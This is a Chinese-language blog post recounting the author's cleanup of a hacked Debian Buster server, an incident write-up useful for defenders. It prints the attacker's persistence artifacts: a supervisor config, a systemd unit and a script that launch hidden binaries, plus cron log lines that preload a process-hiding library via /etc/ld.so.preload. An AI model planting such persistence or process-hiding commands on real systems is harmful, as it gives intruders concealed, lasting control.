<!DOCTYPE html>
<html lang="en-us" dir="ltr">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='上禮拜某天在開會的時候，LINE不斷傳來訊息
不過因為我向來開會都很認真(驕傲，所以都沒看，接著就變成來電了
看來大概有啥事發生
不過畢竟不是正職的工作，就先放著吧
後來變成連學長都直接打來告訴我，某間公司的伺服器出事了，客戶找不到我
叫我趕快連進去看
是說，啊我又沒跟人家簽維護，趕什麼趕&amp;hellip;
總之，開完會後就了解一下狀況
'>
<title>[筆記] Debian Buster 伺服器被入侵了！/ Debian Buster Server Been Hacked</title>

<link rel='canonical' href='https://h.cowbay.org/post/debian-buster-server-been-hacked/'>

<link rel="stylesheet" href="/scss/style.min.8191399262444ab68b72a18c97392f5349be20a1615d77445be51e974c144cff.css"><meta property='og:title' content='[筆記] Debian Buster 伺服器被入侵了！/ Debian Buster Server Been Hacked'>
<meta property='og:description' content='上禮拜某天在開會的時候，LINE不斷傳來訊息
不過因為我向來開會都很認真(驕傲，所以都沒看，接著就變成來電了
看來大概有啥事發生
不過畢竟不是正職的工作，就先放著吧
後來變成連學長都直接打來告訴我，某間公司的伺服器出事了，客戶找不到我
叫我趕快連進去看
是說，啊我又沒跟人家簽維護，趕什麼趕&amp;hellip;
總之，開完會後就了解一下狀況
'>
<meta property='og:url' content='https://h.cowbay.org/post/debian-buster-server-been-hacked/'>
<meta property='og:site_name' content='My New Hugo Site'>
<meta property='og:type' content='article'><meta property='article:section' content='Post' /><meta property='article:tag' content='debian' /><meta property='article:published_time' content='2020-07-10T09:48:24&#43;08:00'/><meta property='article:modified_time' content='2020-07-10T09:48:24&#43;08:00'/><meta property='og:image' content='https://h.cowbay.org/images/post-default-14.jpg' />
<meta name="twitter:title" content="[筆記] Debian Buster 伺服器被入侵了！/ Debian Buster Server Been Hacked">
<meta name="twitter:description" content="上禮拜某天在開會的時候，LINE不斷傳來訊息
不過因為我向來開會都很認真(驕傲，所以都沒看，接著就變成來電了
看來大概有啥事發生
不過畢竟不是正職的工作，就先放著吧
後來變成連學長都直接打來告訴我，某間公司的伺服器出事了，客戶找不到我
叫我趕快連進去看
是說，啊我又沒跟人家簽維護，趕什麼趕&amp;hellip;
總之，開完會後就了解一下狀況
"><meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content='https://h.cowbay.org/images/post-default-14.jpg' />
    </head>
    <body class="
    article-page
    ">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.documentElement.dataset.scheme = 'dark';
        } else {
            document.documentElement.dataset.scheme = 'light';
        }
    })();
</script>
<div class="container main-container flex on-phone--column compact"><aside class="sidebar left-sidebar sticky ">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header>
        
            
            <figure class="site-avatar">
                <a href="/">
                
                    
                    
                    
                        
                        <img src="/img/avatar.png" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                
                </a>
                
            </figure>
            
        
        
        <div class="site-meta">
            <h1 class="site-name"><a href="/">My New Hugo Site</a></h1>
            <h2 class="site-description"></h2>
        </div>
    </header><ol class="menu" id="main-menu">
        
        
        
        <li >
            <a href='/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        
        <li >
            <a href='/page/about/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>About</span>
            </a>
        </li>
        
        
        <li >
            <a href='/page/archives/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-archive" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <rect x="3" y="4" width="18" height="4" rx="2" />
  <path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" />
  <line x1="10" y1="12" x2="14" y2="12" />
</svg>



                
                <span>Archives</span>
            </a>
        </li>
        
        
        <li >
            <a href='/page/search/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-search" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="10" cy="10" r="7" />
  <line x1="21" y1="21" x2="15" y2="15" />
</svg>



                
                <span>Search</span>
            </a>
        </li>
        
        
        <li >
            <a href='/page/links/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-link" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M10 14a3.5 3.5 0 0 0 5 0l4 -4a3.5 3.5 0 0 0 -5 -5l-.5 .5" />
  <path d="M14 10a3.5 3.5 0 0 0 -5 0l-4 4a3.5 3.5 0 0 0 5 5l.5 -.5" />
</svg>



                
                <span>Links</span>
            </a>
        </li>
        

        <div class="menu-bottom-section">
            
            
                <li id="dark-mode-toggle">
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                    <span>Dark Mode</span>
                </li>
            
        </div>
    </ol>
</aside>

    

            <main class="main full-width">
    <article class="has-image main-article">
    <header class="article-header">
        <div class="article-image">
            <a href="/post/debian-buster-server-been-hacked/">
                
                    <img src="https://h.cowbay.org/images/post-default-14.jpg" loading="lazy" alt="Featured image of post [筆記] Debian Buster 伺服器被入侵了！/ Debian Buster Server Been Hacked" />
                
            </a>
        </div>
    

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/%E7%AD%86%E8%A8%98/" >
                筆記
            </a>
        
    </header>
    

    <div class="article-title-wrapper">
        <h2 class="article-title">
            <a href="/post/debian-buster-server-been-hacked/">[筆記] Debian Buster 伺服器被入侵了！/ Debian Buster Server Been Hacked</a>
        </h2>
    
        
    </div>

    
    
    
    
    <footer class="article-time">
        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-calendar-time" width="56" height="56" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M11.795 21h-6.795a2 2 0 0 1 -2 -2v-12a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v4" />
  <circle cx="18" cy="18" r="4" />
  <path d="M15 3v4" />
  <path d="M7 3v4" />
  <path d="M3 11h16" />
  <path d="M18 16.496v1.504l1 1" />
</svg>
                <time class="article-time--published">Jul 10, 2020</time>
            </div>
        

        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



                <time class="article-time--reading">
                    3 minute read
                </time>
            </div>
        
    </footer>
    

    
</div>

</header>

    <section class="article-content">
    
    
    <p>上禮拜某天在開會的時候，LINE不斷傳來訊息</p>
<p>不過因為我向來開會都很認真(驕傲，所以都沒看，接著就變成來電了</p>
<p>看來大概有啥事發生</p>
<p>不過畢竟不是正職的工作，就先放著吧</p>
<p>後來變成連學長都直接打來告訴我，某間公司的伺服器出事了，客戶找不到我</p>
<p>叫我趕快連進去看</p>
<p>是說，啊我又沒跟人家簽維護，趕什麼趕&hellip;</p>
<p>總之，開完會後就了解一下狀況</p>
<p>了解狀況後(user 也只說不能連線..WTF)，還是直接連進去看伺服器啥問題好了</p>
<p>連線的過程就發現，主機回應有點慢</p>
<p>不過還是可以連上，檢查一下ps / netstat 等等訊息，感覺就是有哪裡怪怪的</p>
<p>進去etc 看一下，一下 ls -lart 就發現不對，畫面整個跑掉</p>
<p>感覺就多了很多檔案</p>
<p>所以先裝個file manager 來看(這樣才能避免ls 被駭客調包的情況)</p>
<p>總之就發現了一些不正常的檔案</p>
<p>/etc/.sh 等等族繁不及備載</p>
<p>於是先去FW 把這台機器對外開放的port 先關掉</p>
<p>然後開始紀錄邊清</p>
<p>底下是一些記錄下來的log 很亂，因為是邊清邊紀錄的關係</p>
<p>這是在某個特定日期時間被產生出來的檔案</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>/etc/allow.bak
</span></span><span style="display:flex;"><span>/etc/deny.bak
</span></span><span style="display:flex;"><span>/etc/fstab
</span></span><span style="display:flex;"><span>/etc/sysctl.conf
</span></span><span style="display:flex;"><span>/etc/gshadow
</span></span><span style="display:flex;"><span>/etc/fstab.bak
</span></span><span style="display:flex;"><span>/etc/subuid
</span></span><span style="display:flex;"><span>/etc/subgid
</span></span><span style="display:flex;"><span>/etc/.supervisor
</span></span><span style="display:flex;"><span>/sbin/https
</span></span><span style="display:flex;"><span>/swapfile
</span></span><span style="display:flex;"><span>/var/mail/root
</span></span><span style="display:flex;"><span>/var/lib/rkhunter/tmp/group
</span></span><span style="display:flex;"><span>/var/lib/rkhunter/tmp/passwd
</span></span><span style="display:flex;"><span>/var/lib/dpkg/info/python-meld3.list
</span></span><span style="display:flex;"><span>/var/backups/dpkg.status.1.gz
</span></span><span style="display:flex;"><span>/var/backups/shadow.bak
</span></span><span style="display:flex;"><span>/var/backups/group.bak
</span></span><span style="display:flex;"><span>/var/backups/dpkg.status.6.gz
</span></span><span style="display:flex;"><span>/var/backups/dpkg.status.3.gz
</span></span><span style="display:flex;"><span>/var/backups/dpkg.status.5.gz
</span></span><span style="display:flex;"><span>/var/backups/apt.extended_states.0
</span></span><span style="display:flex;"><span>/var/backups/dpkg.status.2.gz
</span></span><span style="display:flex;"><span>/var/backups/passwd.bak
</span></span><span style="display:flex;"><span>/var/backups/gshadow.bak
</span></span><span style="display:flex;"><span>/var/backups/dpkg.status.0
</span></span><span style="display:flex;"><span>/var/backups/dpkg.status.4.gz
</span></span><span style="display:flex;"><span>/var/log/wtmp.1
</span></span><span style="display:flex;"><span>/var/log/supervisor
</span></span><span style="display:flex;"><span>/var/log/dpkg.log.1
</span></span><span style="display:flex;"><span>/var/log/secure
</span></span><span style="display:flex;"><span>/var/log/apt/term.log.1.gz
</span></span><span style="display:flex;"><span>/var/log/apt/history.log.1.gz
</span></span><span style="display:flex;"><span>/usr/lib/systemd
</span></span><span style="display:flex;"><span>/usr/lib/mysql/mysql
</span></span></code></pre></div><p>/etc/.supervisor/conf.d/sh.conf</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">[</span>program:.sh<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>directory<span style="color:#f92672">=</span>/etc/
</span></span><span style="display:flex;"><span>command<span style="color:#f92672">=</span>/bin/bash -c <span style="color:#e6db74">&#39;cp -f -r -- /etc/spts /bin/.sh 2&gt;/dev/null &amp;&amp; /bin/.sh -c  &gt;/dev/null 2&gt;&amp;1 &amp;&amp; rm -rf -- /bin/.sh 2&gt;/dev/null&#39;</span>
</span></span><span style="display:flex;"><span>autostart<span style="color:#f92672">=</span>true
</span></span><span style="display:flex;"><span>autorestart<span style="color:#f92672">=</span>true
</span></span><span style="display:flex;"><span>startretries<span style="color:#f92672">=</span><span style="color:#ae81ff">999999999</span>
</span></span><span style="display:flex;"><span>redirect_stderr<span style="color:#f92672">=</span>true
</span></span><span style="display:flex;"><span>pidfile<span style="color:#f92672">=</span>/etc/psdewo.pid
</span></span><span style="display:flex;"><span>stdout_logfile<span style="color:#f92672">=</span>/etc/usercenter_stdout
</span></span></code></pre></div><p>php.sh 這個忘了是在crontab 還是/etc/profile.d/底下看到的</p>
<pre tabindex="0"><code>#!/bin/bash
cp -f -r -- /bin/shh /bin/.sh 2&gt;/dev/null
/bin/.sh -c  &gt;/dev/null 2&gt;&amp;1
rm -rf -- .sh 2&gt;/dev/null
</code></pre><p>supervisor.sh</p>
<pre tabindex="0"><code>#!/bin/bash
supervisord -c /etc/.supervisor/supervisord.conf &gt;/dev/null 2&gt;&amp;1
supervisorctl reload &gt;/dev/null 2&gt;&amp;1
</code></pre><p>某個 service 檔案</p>
<pre tabindex="0"><code>[Unit]
Description=.sh

Wants=network.target
After=syslog.target network-online.target

[Service]
Type=forking
ExecStart=/bin/bash -c &#39;cp -f -r -- /bin/.funzip /bin/.sh 2&gt;/dev/null &amp;&amp; /bin/.sh -c  &gt;/dev/null 2&gt;&amp;1 &amp;&amp; rm -rf -- /bin/.sh 2&gt;/dev/null&#39;
Restart=always
KillMode=process

[Install]
WantedBy=multi-user.target
</code></pre><p>syslog 部份內容</p>
<pre tabindex="0"><code>Jul  7 06:20:01 pve CRON[12502]: (root) CMD (/sbin/httpss)
Jul  7 06:20:01 pve CRON[12499]: (root) CMD ( echo /usr/local/lib/libprocesshider.so &gt; /etc/ld.so.preload &amp;&amp; lockr +i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1)
Jul  7 06:21:01 pve CRON[14096]: (root) CMD (/usr/lib/mysql/mysql)
Jul  7 06:21:01 pve CRON[14095]: (root) CMD ( echo /usr/local/lib/libprocesshider.so &gt; /etc/ld.so.preload &amp;&amp; lockr +i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1)
Jul  7 06:21:01 pve CRON[14094]: (root) CMD ( cp -f -r -- /etc/.sh /tmp/.sh 2&gt;/dev/null &amp;&amp; /tmp/.sh -c  &gt;/dev/null 2&gt;&amp;1 &amp;&amp; rm -rf -- /tmp/.sh 2&gt;/dev/null)
Jul  7 06:22:01 pve CRON[15995]: (root) CMD ( echo /usr/local/lib/libprocesshider.so &gt; /etc/ld.so.preload &amp;&amp; lockr +i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1)
Jul  7 06:22:01 pve CRON[15994]: (root) CMD ( cp -f -r -- /etc/.sh /tmp/.sh 2&gt;/dev/null &amp;&amp; /tmp/.sh -c  &gt;/dev/null 2&gt;&amp;1 &amp;&amp; rm -rf -- /tmp/.sh 2&gt;/dev/null)
Jul  7 06:22:01 pve CRON[15996]: (root) CMD (/usr/lib/mysql/mysql)
Jul  7 06:23:01 pve CRON[17708]: (root) CMD ( echo /usr/local/lib/libprocesshider.so &gt; /etc/ld.so.preload &amp;&amp; lockr +i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1)
Jul  7 06:23:01 pve CRON[17709]: (root) CMD ( cp -f -r -- /etc/.sh /tmp/.sh 2&gt;/dev/null &amp;&amp; /tmp/.sh -c  &gt;/dev/null 2&gt;&amp;1 &amp;&amp; rm -rf -- /tmp/.sh 2&gt;/dev/null)
Jul  7 06:23:01 pve CRON[17710]: (root) CMD (/usr/lib/mysql/mysql)
Jul  7 06:24:01 pve CRON[19353]: (root) CMD ( cp -f -r -- /etc/.sh /tmp/.sh 2&gt;/dev/null &amp;&amp; /tmp/.sh -c  &gt;/dev/null 2&gt;&amp;1 &amp;&amp; rm -rf -- /tmp/.sh 2&gt;/dev/null)
Jul  7 06:24:01 pve CRON[19351]: (root) CMD ( echo /usr/local/lib/libprocesshider.so &gt; /etc/ld.so.preload &amp;&amp; lockr +i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1)
Jul  7 06:24:01 pve CRON[19352]: (root) CMD (/usr/lib/mysql/mysql)
Jul  7 06:25:01 pve CRON[21289]: (root) CMD ( cp -f -r -- /etc/.sh /tmp/.sh 2&gt;/dev/null &amp;&amp; /tmp/.sh -c  &gt;/dev/null 2&gt;&amp;1 &amp;&amp; rm -rf -- /tmp/.sh 2&gt;/dev/null)
Jul  7 06:25:01 pve CRON[21290]: (root) CMD (/usr/lib/mysql/mysql)
Jul  7 06:25:01 pve CRON[21288]: (root) CMD (test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.daily ))
Jul  7 06:25:01 pve CRON[21291]: (root) CMD ( echo /usr/local/lib/libprocesshider.so &gt; /etc/ld.so.preload &amp;&amp; lockr +i /etc/ld.so.preload &gt;/dev/null 2&gt;&amp;1)
</code></pre><p>比較特別的是，他會去修改 /etc/fstab 載入一個 swapfile</p>
<p>WTF！？ 沒事載入自己的 fstab 做啥？？</p>
<p>然後還會在系統建立user 可以看一下 /etc/passwd , /etc/group , /etc/gshadow 這些檔案檢查</p>
<p>手邊最好有另一臺乾淨的同樣作業系統的機器</p>
<p>因為有很多系統指令已經被替換掉(netstat/ss/lsof 等等)</p>
<p>需要從乾淨的系統弄過來，或者是重新從apt 安裝回來</p>
</section>


    <footer class="article-footer">
    
    <section class="article-tags">
        
            <a href="/tags/debian/">debian</a>
        
    </section>


    </footer>


    
</article>

    

    

     
    
        
    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
        2023 My New Hugo Site
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="3.16.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>


    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css"crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css"crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.6/dist/vibrant.min.js"integrity="sha256-awcR2jno4kI5X0zL8ex0vi2z&#43;KMkF24hUW8WePSA9HM="crossorigin="anonymous"
                
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
